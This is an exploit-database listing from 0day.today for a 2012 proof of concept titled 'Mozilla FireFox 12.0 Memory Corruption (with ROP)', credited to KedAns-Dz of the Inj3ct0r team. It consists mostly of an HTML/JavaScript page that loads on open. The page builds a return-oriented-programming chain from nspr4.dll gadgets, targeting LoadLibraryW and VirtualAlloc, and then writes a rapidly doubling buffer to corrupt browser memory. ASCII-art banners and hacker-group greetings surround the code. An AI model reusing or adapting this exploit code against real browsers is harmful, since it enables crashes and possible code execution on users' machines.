[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Mozilla FireFox 12.0 Memory Corruption (with ROP)

Author
KedAns-Dz
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-18317
Category
dos / poc
Date add
20-05-2012
Platform
windows
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : Mozilla FireFox 12.0 Memory Corruption (with ROP)
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com | www.inj3ct0rs.com
# mY nEw FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com
# platform : Windows
# Type : Local
# Security Risk : High
# Tested on : Windows XP-SP3 (Fr)
###

##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * soucha |
# | ***** KinG Of PiraTeS * The g0bl!n * dr.R!dE  ***** |
# | ------------------------------------------------- < |
##

./<3 <3 Greetings t0 Palestine <3 <3

<html>
<head>
<title>Memory Corruption bY KedAns-Dz</title>
<body onload="javascript:KedAns();">
<script language="JavaScript">
      function KedAns()
       {
	
  // Start ROP { Target : nspr4.dll } =>
var rop =unescape("%ubfc1%u1000"); // POP ECX / RETN
rop+=unescape("%u0060%u1002"); // ptr to &LoadLibraryW()
rop+=unescape("%uf986%u1000"); // MOV EAX,DWORD PTR DS:[ECX] / RETN
rop+=unescape("%uf5ef%u1000"); // POP EBX / RETN
rop+=unescape("%u0000%u0000"); // clear ebx
rop+=unescape("%u6f51%u1000"); // ADD EBX,EAX / XOR EAX,EAX / RETN
rop+=unescape("%ucf2c%u1000"); // POP EDX / RETN
rop+=unescape("%uea03%u1001"); // RETN (ROP NOP)
rop+=unescape("%ubfc1%u1000"); // POP ECX / RETN
rop+=unescape("%u0c50%u0c0c"); // xul.dll (Unicode string)
rop+=unescape("%uee6a%u1000"); // POP EDI / RETN
rop+=unescape("%udda4%u1000"); // ADD ESP,0C / RETN - call LoadLibrary
rop+=unescape("%u4870%u1000"); // POP EAX / RETN
rop+=unescape("%u1ab4%u1000"); // ADD ESP,10 / POP ESI / RETN
rop+=unescape("%u58c3%u1000"); // PUSHAD / CALL EAX

rop+=unescape("%u0070%u0041"); // MOV EBP,ESP (nspr4.dll)

rop+=unescape("%u4142%u4142"); // Buffer Junk!
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");

rop+=unescape("%u0078%u0075"); // xul.dll
rop+=unescape("%u006c%u002e");
rop+=unescape("%u0064%u006c");
rop+=unescape("%u006c%u0000");

rop+=unescape("%ucf2c%u1000"); // POP EDX / RETN
rop+=unescape("%u3374%u00a6"); // Delta to IAT VirtualAlloc()
rop+=unescape("%u8acf%u1001"); // ADD EAX,EDX / RETN
rop+=unescape("%u8dd1%u1000"); // MOV EAX,DWORD PTR DS:[EAX] / RETN
rop+=unescape("%ue0b8%u1000"); // POP ESI / RETN
rop+=unescape("%ue0b8%u1000"); // POP ESI / RETN
rop+=unescape("%u3f14%u1001"); // XCHG EAX,ESI / ADD DL,BYTE PTR DS:[EAX] / RETN
rop+=unescape("%u62d5%u1001"); // POP EBP / RETN
rop+=unescape("%u9d12%u1001"); // push esp /  ret
rop+=unescape("%uf5ef%u1000"); // POP EBX / RETN
rop+=unescape("%u0001%u0000"); // 0x00000001-> ebx
rop+=unescape("%ucf2c%u1000"); // POP EDX / RETN
rop+=unescape("%u1000%u0000"); // 0x00001000-> edx
rop+=unescape("%u7e46%u1000"); // POP ECX / RETN
rop+=unescape("%u0040%u0000"); // 0x00000040-> ecx
rop+=unescape("%uaa6a%u1000"); // POP EDI / RETN
rop+=unescape("%uaa03%u1001"); // RETN (ROP NOP)
rop+=unescape("%u4870%u1000"); // POP EAX / RETN
rop+=unescape("%u4870%u1000"); // POP EAX / RETN
rop+=unescape("%u58c3%u1000"); // PUSHAD / CALL EAX

	document.write(rop); // Just 4 make Extern Buffer

	var buffer = '\x41\x42\x43' // ABC buffer
    for(i=0; i <= 999 ; ++i)
	{
    buffer+=buffer+buffer
	document.write(buffer); // Crash Memory !
	
	}
	
// [ Memory Corruption !! (*__^) ]

} 
</script>
</head>
</body>
</html>

# << ThE|End
 __________________________________________________
< I'm VerrY BusSyY :p (x__x) 0xFuFuCkcK 0xShsHiiiT >
 --------------------------------------------------
                     \  ,__,
  > Fr0m Z0nE 404! <  \ (oo)_____
 Inj3ct0r LAB (C) 2012  (__) K3d )\  OWASP Algeria
 Dz Offenders & CA | HMD   ||---|| *  all Dz Hax0r5

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=======================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky * HMD-Cr3w
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n *
# Angel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * r00tw0rm.com 
# packetstormsecurity.org * metasploit.com * Chivr0sky * OWASP Dz * All Security and Exploits Webs ..
#===================================================================================================



#  0day.today [2024-12-23]  #